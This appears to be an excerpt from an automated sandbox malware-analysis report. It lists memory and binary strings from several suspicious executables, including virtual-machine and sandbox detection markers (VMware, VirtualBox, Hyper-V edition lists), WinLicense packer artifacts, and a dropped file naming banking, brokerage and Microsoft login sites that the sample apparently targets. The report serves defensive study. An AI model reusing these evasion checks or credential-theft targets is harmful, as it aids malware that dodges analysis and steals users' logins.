Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: vmware
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.8.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: explorti.exe, explorti.exe, 0000000E.00000002.3413173468.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual USB Mouse
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.8.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwarew
Source: KJEBKJDA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.8.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEBKJDA.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: ~VirtualMachineTypes
Source: KJEBKJDA.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: file.exe, file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: ]DLL_Loader_VirtualMachine
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: file.exe, 00000000.00000002.2623849094.0000000001605000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP4g
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.00000000006CC000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.000000000111C000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: KJEBKJDA.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: KJEBKJDA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: BAFIEGIECG.exe, 0000000A.00000002.2677748862.00000000005EB000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 0000000C.00000002.2708903828.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000D.00000002.2719044484.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000E.00000002.3413173468.0000000000BAB000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Hyper-V
Source: Amcache.hve.8.dr	Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: discord.comVMware20,11696487552f
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: KJEBKJDA.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000002.2623849094.000000000166F000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.000000000080B000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000E.00000002.3408169203.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001D09000.00000004.00000020.00020000.00000000.sdmp, 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: KJEBKJDA.0.dr	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: KJEBKJDA.0.dr	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: KJEBKJDA.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 7873c16243.exe, 0000000F.00000002.2839628750.0000000001CB5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr	Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: KJEBKJDA.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: KJEBKJDA.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.8.dr	Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.8.dr	Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: xVBoxService.exe
Source: Amcache.hve.8.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr	Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.8.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2622413487.000000000059C000.00000040.00000001.01000000.00000003.sdmp, 7873c16243.exe, 0000000F.00000002.2838460669.0000000000FEC000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: *Windows 11 Server Standard without Hyper-V
